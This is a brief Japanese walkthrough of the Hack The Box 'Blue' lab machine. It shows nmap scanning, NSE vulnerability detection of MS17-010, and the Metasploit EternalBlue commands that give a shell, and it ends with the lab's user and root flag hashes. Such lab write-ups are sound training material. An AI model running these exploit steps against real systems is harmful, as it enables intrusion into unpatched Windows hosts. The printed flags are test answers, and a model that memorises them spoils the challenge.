【Hack The Box】Blue Walkthrough
はじめに
ポートスキャン
マシン名からしてEternalblue(MS17-010)の脆弱性があるんだろうなと思いながら、ポートスキャンを実行。
# nmap -A 10.10.10.40
135(msrpc)、139(netbios-ssn)、445(microsoft-ds)、49152~49167(netbios-ssn)が開いている。
445ポートの脆弱性調査
NSEを使って、445ポートの脆弱性を調べる。
# nmap --script vuln -p 445 10.10.10.40
予想通り、MS17-010がVULNERABLEと判定された。
MS17-010の調査
MetasploitでMS17-010の脆弱性を突くエクスプロイトコードを探してみる。
# msfconsole msf5 > search ms17-010 msf5 > use exploit/windows/smb/ms17_010_eternalblue msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40 msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
エクスプロイトコードの実行は成功し、ターゲット端末のシェルを獲得できた。
後はharisユーザのデスクトップ上にあるuser.txtとAdministratorユーザのデスクトップ上にあるroot.txtの中身を取得して終了。
user.txt:4c546aea7dbee75cbd71de245c8deea9
root.txt:ff548eb71e920ff6c08843ce9df4e717